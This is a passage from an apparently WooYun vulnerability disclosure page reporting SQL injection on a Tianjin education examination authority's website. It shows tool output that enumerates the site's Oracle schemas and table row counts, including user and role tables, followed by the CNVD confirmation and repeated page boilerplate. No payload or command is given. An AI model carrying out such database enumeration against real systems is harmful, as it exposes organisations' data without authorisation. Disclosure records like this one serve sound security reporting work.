| SUMDELTA$                      |
| SUMDEP$                        |
| SUMDETAIL$                     |
| SUMINLINE$                     |
| SUMJOIN$                       |
| SUMKEY$                        |
| SUMPARTLOG$                    |
| SUMPRED$                       |
| SUPEROBJ$                      |
| SYN$                           |
| SYSAUTH$                       |
| SYSTEM_PRIVILEGE_MAP           |
| TAB$                           |
| TABCOMPART$                    |
| TABLE_PRIVILEGE_MAP            |
| TABPART$                       |
| TABSUBPART$                    |
| TRANSFORMATIONS$               |
| TRIGGER$                       |
| TRIGGERCOL$                    |
| TRIGGERJAVAC$                  |
| TRIGGERJAVAF$                  |
| TRIGGERJAVAM$                  |
| TRIGGERJAVAS$                  |
| TRUSTED_LIST$                  |
| TS$                            |
| TSQ$                           |
| TYPE$                          |
| TYPED_VIEW$                    |
| TYPEHIERARCHY$                 |
| TYPE_MISC$                     |
| UET$                           |
| UGROUP$                        |
| UNDO$                          |
| USER$                          |
| USER_ASTATUS_MAP               |
| USER_HISTORY$                  |
| USTATS$                        |
| UTL_RECOMP_BACKUP_JOBS         |
| UTL_RECOMP_COMPILED            |
| UTL_RECOMP_INVALID             |
| UTL_RECOMP_LOG                 |
| UTL_RECOMP_SORTED              |
| VIEW$                          |
| VIEWCON$                       |
| VIEWTRCOL$                     |
| VTABLE$                        |
| _DEFAULT_AUDITING_OPTIONS_     |
+--------------------------------+
Database: SH
[15 tables]
+--------------------------------+
| CAL_MONTH_SALES_MV             |
| CHANNELS                       |
| COSTS                          |
| COUNTRIES                      |
| CUSTOMERS                      |
| FWEEK_PSCAT_SALES_MV           |
| MVIEW$_EXCEPTIONS              |
| MV_CAPABILITIES_TABLE          |
| PLAN_TABLE                     |
| PRODUCTS                       |
| PROMOTIONS                     |
| REWRITE_TABLE                  |
| SALES                          |
| SALES_TRANSACTIONS_EXT         |
| TIMES                          |
+--------------------------------+
Database: SCOTT
[4 tables]
+--------------------------------+
| BONUS                          |
| DEPT                           |
| EMP                            |
| SALGRADE                       |
+--------------------------------+
Database: WMSYS
[22 tables]
+--------------------------------+
| WM$ADT_FUNC_TABLE              |
| WM$ENV_VARS                    |
| WM$INSTEADOF_TRIGS_TABLE       |
| WM$LOCKROWS_INFO               |
| WM$MODIFIED_TABLES             |
| WM$MW_TABLE                    |
| WM$NESTED_COLUMNS_TABLE        |
| WM$NEXTVER_TABLE               |
| WM$REPLICATION_TABLE           |
| WM$RESOLVE_WORKSPACES_TABLE    |
| WM$RIC_TABLE                   |
| WM$RIC_TRIGGERS_TABLE          |
| WM$TMP_DBA_CONSTRAINTS         |
| WM$UDTRIG_DISPATCH_PROCS       |
| WM$UDTRIG_INFO                 |
| WM$VERSIONED_TABLES            |
| WM$VERSION_HIERARCHY_TABLE     |
| WM$VERSION_TABLE               |
| WM$VT_ERRORS_TABLE             |
| WM$WORKSPACES_TABLE            |
| WM$WORKSPACE_PRIV_TABLE        |
| WM$WORKSPACE_SAVEPOINTS_TABLE  |
+--------------------------------+
Database: ODM_MTR
[12 tables]
+--------------------------------+
| CENSUS_2D_APPLY_BINNED         |
| CENSUS_2D_APPLY_UNBINNED       |
| CENSUS_2D_BUILD_BINNED         |
| CENSUS_2D_BUILD_UNBINNED       |
| CENSUS_2D_TEST_BINNED          |
| CENSUS_2D_TEST_UNBINNED        |
| EIGHT_CLOUDS_APPLY_UNBINNED    |
| EIGHT_CLOUDS_BUILD_UNBINNED    |
| MAGAZINE_2D_BUILD_BINNED       |
| MAGAZINE_2D_TEST_BINNED        |
| MARKET_BASKET_2D_BINNED        |
| MARKET_BASKET_TX_BINNED        |
+--------------------------------+

漏洞证明：

顺便跑了下count

Database: QS_OS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| AQ$_QS_OS_ORDERS_MQTAB_S    | 1       |
| AQ$_QS_OS_ORDERS_PR_MQTAB_S | 1       |
+-----------------------------+---------+
Database: WKSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| WK$CHARSET                  | 57      |
| WK$CRAWLER_CONFIG_DEFAULT   | 38      |
| WK$MIMETYPES                | 35      |
| WK$LANG                     | 14      |
| WK$SYS_CONFIG               | 1       |
+-----------------------------+---------+
Database: ORDSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| ORD_CARTRIDGE_COMPONENTS    | 86      |
| JACCELERATOR$DLLS           | 14      |
| ORD_INSTALLATIONS           | 1       |
+-----------------------------+---------+
Database: HR
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| EMPLOYEES                   | 107     |
| DEPARTMENTS                 | 27      |
| COUNTRIES                   | 25      |
| LOCATIONS                   | 23      |
| JOBS                        | 19      |
| JOB_HISTORY                 | 10      |
| REGIONS                     | 4       |
+-----------------------------+---------+
Database: OLAPSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| CWM$ITEMUSE                 | 118     |
| CWM$LEVELATTRIBUTE          | 67      |
| CWM$CLASSIFICATIONENTRY     | 66      |
| CWM$ITEMMAP                 | 59      |
| CWM$LEVEL                   | 27      |
| CWM$CLASSIFICATION          | 24      |
| CWM$DIMENSIONATTRIBUTE      | 23      |
| CWM$DOMAIN                  | 21      |
| CWM$FUNCTION                | 13      |
| CWM$CLASSIFICATIONTYPE      | 10      |
| CWM$OBJECTTYPE              | 10      |
| CWM$CUBEDIMENSIONUSE        | 7       |
| CWM$FACTLEVELUSE            | 7       |
| CWM$HIERARCHY               | 7       |
| CWM$DIMENSION               | 5       |
| CWM$PARAMETER               | 5       |
| CWM$FACTUSE                 | 4       |
| CWM$FUNCTIONUSE             | 4       |
| CWM$MEASURE                 | 4       |
| CWM$MEASUREDIMENSIONUSE     | 4       |
| CWM$MODEL                   | 3       |
| CWM$PROJECT                 | 3       |
| CWM$CUBE                    | 2       |
| CWM$FACTLEVELGROUP          | 2       |
| CWM$FACTTABLEMAP            | 2       |
+-----------------------------+---------+
Database: XDB
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| XDB$H_INDEX                 | 12      |
| XDB$ROOT_INFO               | 1       |
+-----------------------------+---------+
Database: QS_CS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| AQ$_QS_CS_ORDER_STATUS_QT_S | 1       |
+-----------------------------+---------+
Database: MDSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| CS_SRS                      | 1000    |
| SDO_DATUMS                  | 118     |
| MD$RELATE                   | 90      |
| SDO_DIST_UNITS              | 54      |
| SDO_AREA_UNITS              | 48      |
| SDO_ELLIPSOIDS              | 47      |
| SDO_PROJECTIONS             | 42      |
| SDO_ANGLE_UNITS             | 12      |
+-----------------------------+---------+
Database: ODM
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| ODM_ERROR_TABLE             | 342     |
| ODM_CONFIGURATION           | 25      |
| ODM_INTERNAL_CONFIGURATION  | 19      |
| ODM_PMML_DTD                | 1       |
+-----------------------------+---------+
Database: QS_CBADM
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| AQ$_QS_CBADM_ORDERS_MQTAB_S | 3       |
+-----------------------------+---------+
Database: CTXSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| DR$STOPWORD                 | 152     |
| DR$OBJECT_ATTRIBUTE         | 135     |
| DR$OBJECT_ATTRIBUTE_LOV     | 106     |
| DR$SECTION                  | 103     |
| DR$INDEX_VALUE              | 80      |
| DR$OBJECT                   | 44      |
| DR$PREFERENCE               | 31      |
| DR$PARAMETER                | 27      |
| DR$PREFERENCE_VALUE         | 15      |
| DR$CLASS                    | 11      |
| DR$INDEX_OBJECT             | 9       |
| DR$SECTION_GROUP            | 6       |
| DR$STOPLIST                 | 3       |
| DR$SUB_LEXER                | 3       |
| DR$INDEX                    | 1       |
| DR$INDEX_SET                | 1       |
+-----------------------------+---------+
Database: VCMS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| WEB_ADVISE                  | 93022   |
| WEB_ADVISE                  | 93022   |
| WEB_NEWS                    | 4373    |
| KCMX                        | 3986    |
| KCMX_BAK                    | 3923    |
| WEB_USERCOLUMN              | 1599    |
| WEB_COLUMN                  | 936     |
| ZXJGANDZHUANYE              | 710     |
| WEB_DIRECTORMAIL            | 675     |
| ROLEUSERS                   | 327     |
| ZKZY_NEW_BAK                | 229     |
| ZKZY_NEW                    | 216     |
| USERS                       | 146     |
| ROLEFUNS                    | 103     |
| MYZXJG                      | 68      |
| FUNS_BAK                    | 62      |
| FUNS                        | 61      |
| CODES                       | 47      |
| DEPARTMENT                  | 39      |
| ZKYX                        | 32      |
| WEB_STATCOLUMN              | 29      |
| ROLES                       | 20      |
| SEQUENCE                    | 9       |
| DAGANG                      | 2       |
| MESSAGE                     | 2       |
| ZSPX                        | 2       |
+-----------------------------+---------+
Database: QS_ES
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| AQ$_QS_ES_ORDERS_MQTAB_S    | 1       |
| AQ$_QS_ES_ORDERS_PR_MQTAB_S | 1       |
+-----------------------------+---------+
Database: PM
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| ONLINE_MEDIA                | 9       |
| PRINT_MEDIA                 | 4       |
+-----------------------------+---------+
Database: RMAN
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| CONFIG                      | 1       |
| RCVER                       | 1       |
+-----------------------------+---------+
Database: QS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| AQ$_AQ$_MEM_MC_S            | 1       |
| AQ$_QS_ORDERS_PR_MQTAB_S    | 1       |
+-----------------------------+---------+
Database: QS_WS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| AQ$_QS_WS_ORDERS_MQTAB_S    | 5       |
| AQ$_QS_WS_ORDERS_PR_MQTAB_S | 1       |
+-----------------------------+---------+
Database: OE
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| PRODUCT_DESCRIPTIONS        | 8640    |
| INVENTORIES                 | 1112    |
| ORDER_ITEMS                 | 665     |
| CUSTOMERS                   | 319     |
| PRODUCT_INFORMATION         | 288     |
| ORDERS                      | 105     |
| WAREHOUSES                  | 9       |
+-----------------------------+---------+
Database: SYSTEM
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| HELP                        | 918     |
| LOGSTDBY$SKIP_SUPPORT       | 74      |
| AQ$_QUEUES                  | 40      |
| MVIEW$_ADV_PARAMETERS       | 40      |
| REPCAT$_OBJECT_TYPES        | 28      |
| REPCAT$_RESOLUTION_METHOD   | 19      |
| AQ$_QUEUE_TABLES            | 17      |
| REPCAT$_TEMPLATE_STATUS     | 3       |
| REPCAT$_AUDIT_ATTRIBUTE     | 2       |
| REPCAT$_TEMPLATE_TYPES      | 2       |
+-----------------------------+---------+
Database: SYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| SOURCE$                     | 152328  |
| DEPENDENCY$                 | 50048   |
| ARGUMENT$                   | 47847   |
| ACCESS$                     | 43374   |
| COL$                        | 35282   |
| IDL_UB1$                    | 32608   |
| OBJ$                        | 30192   |
| IDL_SB4$                    | 19037   |
| IDL_UB2$                    | 16908   |
| OBJAUTH$                    | 13925   |
| IDL_CHAR$                   | 12455   |
| SYN$                        | 11560   |
| PROCEDUREINFO$              | 10421   |
| COM$                        | 7150    |
| JAVASNM$                    | 6607    |
| SETTINGS$                   | 4248    |
| ATTRIBUTE$                  | 3336    |
| CCOL$                       | 3317    |
| CON$                        | 3020    |
| CDEF$                       | 3019    |
| SEG$                        | 2666    |
| VIEW$                       | 2541    |
| PARAMETER$                  | 2531    |
| ICOL$                       | 1951    |
| SMON_SCN_TIME               | 1440    |
| IND$                        | 1388    |
| PROCEDURE$                  | 1281    |
| ATTRCOL$                    | 1124    |
| COLTYPE$                    | 1103    |
| OID$                        | 1070    |
| SYSAUTH$                    | 1052    |
| METHOD$                     | 1036    |
| TAB$                        | 907     |
| TYPE$                       | 851     |
| TYPE_MISC$                  | 843     |
| HISTGRM$                    | 795     |
| VTABLE$                     | 759     |
| RESULT$                     | 696     |
| HIST_HEAD$                  | 619     |
| HS$_BASE_CAPS               | 490     |
| PROCEDUREJAVA$              | 434     |
| COL_USAGE$                  | 384     |
| LOB$                        | 368     |
| PROCEDUREC$                 | 234     |
| METAFILTER$                 | 220     |
| COLLECTION$                 | 207     |
| STMT_AUDIT_OPTION_MAP       | 167     |
| TRIGGERCOL$                 | 160     |
| SYSTEM_PRIVILEGE_MAP        | 157     |
| AUDIT_ACTIONS               | 144     |
| TYPED_VIEW$                 | 136     |
| INDPART$                    | 128     |
| SEQ$                        | 126     |
| NTAB$                       | 121     |
| HS$_BASE_DD                 | 102     |
| OPARG$                      | 101     |
| LIBRARY$                    | 90      |
| TRIGGER$                    | 88      |
| METAXSLPARAM$               | 84      |
| JAVA$POLICY$                | 78      |
| EXPDEPACT$                  | 73      |
| DIMATTR$                    | 71      |
| METAVIEW$                   | 70      |
| NOEXP$                      | 66      |
| USER$                       | 64      |
| REFCON$                     | 61      |
| PARTCOL$                    | 60      |
| PARTOBJ$                    | 60      |
| METASTYLESHEET              | 58      |
| BOOTSTRAP$                  | 57      |
| EXPDEPOBJ$                  | 57      |
| METAXSL$                    | 57      |
| PS$                         | 55      |
| TABPART$                    | 55      |
| TYPEHIERARCHY$              | 48      |
| OPBINDING$                  | 40      |
| LOGMNR_INTERESTING_COLS     | 34      |
| INDOP$                      | 33      |
| HIERLEVEL$                  | 31      |
| OPQTYPE$                    | 29      |
| OPERATOR$                   | 28      |
| DIMLEVEL$                   | 27      |
| DIMLEVELKEY$                | 27      |
| SUBCOLTYPE$                 | 27      |
| TSQ$                        | 27      |
| UTL_RECOMP_COMPILED         | 26      |
| PROPS$                      | 25      |
| TABLE_PRIVILEGE_MAP         | 23      |
| EXPPKGACT$                  | 21      |
| UNDO$                       | 21      |
| JACCELERATOR$DLLS           | 19      |
| RLS$                        | 18      |
| AQ$_QUEUE_TABLE_AFFINITIES  | 17      |
| EXPACT$                     | 17      |
| PROFILE$                    | 17      |
| RESOURCE_MAP                | 16      |
| REGISTRY$                   | 15      |
| RULE_SET$                   | 15      |
| OPANCILLARY$                | 14      |
| TS$                         | 14      |
| FILE$                       | 11      |
| OLAP$ALTER_SESSION          | 11      |
| RULE_EC$                    | 11      |
| CLU$                        | 10      |
| REC_TAB$                    | 10      |
| RESOURCE_COST$              | 10      |
| EXPPKGOBJ$                  | 9       |
| ICOLDEP$                    | 9       |
| INDTYPES$                   | 9       |
| USER_ASTATUS_MAP            | 9       |
| DUC$                        | 8       |
| ASSOCIATION$                | 7       |
| HIER$                       | 7       |
| RESOURCE_PLAN_DIRECTIVE$    | 6       |
| DIM$                        | 5       |
| SNAP_LOGDEP$                | 5       |
| SNAP_REFTIME$               | 5       |
| SUMDEP$                     | 5       |
| SUMDETAIL$                  | 5       |
| SUMKEY$                     | 5       |
| RESOURCE_CONSUMER_GROUP$    | 4       |
| SQL_VERSION$                | 4       |
| SUMPRED$                    | 4       |
| DIR$                        | 3       |
| RESOURCE_PLAN$              | 3       |
| SNAP_LOADERTIME$            | 3       |
| SUMJOIN$                    | 3       |
| AW$                         | 2       |
| CONTEXT$                    | 2       |
| JAVA$POLICY$SHARED$TABLE    | 2       |
| REC_VAR$                    | 2       |
| REG_SNAP$                   | 2       |
| SNAP$                       | 2       |
| SUM$                        | 2       |
| SUMAGG$                     | 2       |
| TRIGGERJAVAC$               | 2       |
| TRIGGERJAVAF$               | 2       |
| TRIGGERJAVAM$               | 2       |
| TRIGGERJAVAS$               | 2       |
| "DUAL"                      | 1       |
| AURORA$SHUTDOWN$CLASSES$    | 1       |
| AURORA$STARTUP$CLASSES$     | 1       |
| AW$CWMTOECM                 | 1       |
| AW$EXPRESS                  | 1       |
| CDC_CHANGE_SETS$            | 1       |
| CDC_CHANGE_SOURCES$         | 1       |
| CDC_SYSTEM$                 | 1       |
| DIMJOINKEY$                 | 1       |
| EXTERNAL_LOCATION$          | 1       |
| EXTERNAL_TAB$               | 1       |
| HS$_FDS_CLASS               | 1       |
| HS$_FDS_CLASS_DATE          | 1       |
| ID_GENS$                    | 1       |
| INCVID                      | 1       |
| JAVA$JVM$STATUS             | 1       |
| KOPM$                       | 1       |
| MIGRATE$                    | 1       |
| PROFNAME$                   | 1       |
| SNAP_REFOP$                 | 1       |
| SUPEROBJ$                   | 1       |
| TRUSTED_LIST$               | 1       |
| VIEWTRCOL$                  | 1       |
+-----------------------------+---------+
Database: SH
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| SALES                       | 1016271 |
| COSTS                       | 787766  |
| FWEEK_PSCAT_SALES_MV        | 149325  |
| CUSTOMERS                   | 50000   |
| PRODUCTS                    | 10000   |
| TIMES                       | 1461    |
| PROMOTIONS                  | 501     |
| CAL_MONTH_SALES_MV          | 35      |
| COUNTRIES                   | 19      |
| CHANNELS                    | 5       |
+-----------------------------+---------+
Database: SCOTT
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| EMP                         | 14      |
| SALGRADE                    | 5       |
| DEPT                        | 4       |
+-----------------------------+---------+
Database: WMSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| WM$WORKSPACE_PRIV_TABLE     | 8       |
| WM$ENV_VARS                 | 1       |
| WM$VERSION_HIERARCHY_TABLE  | 1       |
| WM$WORKSPACES_TABLE         | 1       |
+-----------------------------+---------+
Database: ODM_MTR
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| MAGAZINE_2D_BUILD_BINNED    | 6012    |
| EIGHT_CLOUDS_APPLY_UNBINNED | 4000    |
| EIGHT_CLOUDS_BUILD_UNBINNED | 4000    |
| MARKET_BASKET_TX_BINNED     | 3800    |
| CENSUS_2D_BUILD_BINNED      | 2940    |
| CENSUS_2D_BUILD_UNBINNED    | 2940    |
| MAGAZINE_2D_TEST_BINNED     | 2613    |
| CENSUS_2D_APPLY_BINNED      | 1226    |
| CENSUS_2D_APPLY_UNBINNED    | 1226    |
| MARKET_BASKET_2D_BINNED     | 1000    |
| CENSUS_2D_TEST_BINNED       | 834     |
| CENSUS_2D_TEST_UNBINNED     | 834     |
+-----------------------------+---------+

修复方案：

过滤

版权声明：转载请注明来源 Yang@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-01-12 11:03

厂商回复：

CNVD确认并复现所述漏洞情况，已经转由CNCERT下发给天津分中心，由天津分中心后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-090360

漏洞标题：某市教育招生考试院网站存在SQL注入导致信息泄露

相关厂商：天津市教育招生考试院

漏洞作者： Yang

提交时间：2015-01-07 12:23

修复时间：2015-02-21 12:24

公开时间：2015-02-21 12:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Yang@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-090360

漏洞标题：某市教育招生考试院网站存在SQL注入导致信息泄露

相关厂商：天津市教育招生考试院

漏洞作者： Yang

提交时间：2015-01-07 12:23

修复时间：2015-02-21 12:24

公开时间：2015-02-21 12:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-090360"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Yang@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：